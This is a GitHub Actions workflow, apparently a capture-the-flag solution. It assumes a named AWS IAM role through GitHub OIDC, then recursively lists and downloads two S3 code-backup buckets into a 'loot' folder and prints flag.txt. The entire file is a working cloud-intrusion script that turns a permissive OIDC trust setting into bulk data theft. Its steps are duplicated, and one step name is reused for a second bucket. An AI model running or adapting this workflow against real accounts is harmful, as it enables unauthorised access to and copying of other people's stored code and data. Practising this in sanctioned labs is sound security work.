name: Open the Dragon-Eye

on:
  workflow_dispatch:       # so you can click ‘Run’ manually
  push:
    branches: [ "main" ]   # keeps the sub-claim on main

permissions:
  id-token: write          # ♦️ REQUIRED for OIDC
  contents: read

jobs:
  gaze:
    runs-on: ubuntu-latest
    steps:
      - name: Assume the Eye-role
        uses: aws-actions/configure-aws-credentials@v2
        with:
          role-to-assume: arn:aws:iam::110678717447:role/AWSServicesRoleForGithub-jovb4kjb
          aws-region: us-west-2

      - name: Plunder the Vault
        run: |
          echo "Listing the hidden prefix..."
          aws s3 ls s3://codebackup-jovb4kjb/github/ --recursive

          echo "Downloading everything..."
          aws s3 cp s3://codebackup-jovb4kjb/github/ ./loot --recursive
          cat loot/flag.txt
          aws s3 ls s3://codebackup-jovb4kjb/github/ --recursive

          echo "Downloading everything..."
          aws s3 cp s3://codebackup-jovb4kjb/github/ ./loot --recursive
          cat loot/flag.txt
      - name: Plunder the Vault
        run: |
          echo "Listing the hidden prefix..."
          aws s3 ls s3://codebackup-hkm1wim5/github --recursive

          echo "Downloading everything..."
          aws s3 cp s3://codebackup-hkm1wim5/github/ ./loot --recursive
          cat loot/flag.txt
          aws s3 ls s3://codebackup-hkm1wim5/github/ --recursive

          echo "Downloading everything..."
          aws s3 cp s3://codebackup-hkm1wim5/github/ ./loot --recursive
          cat loot/flag.txt
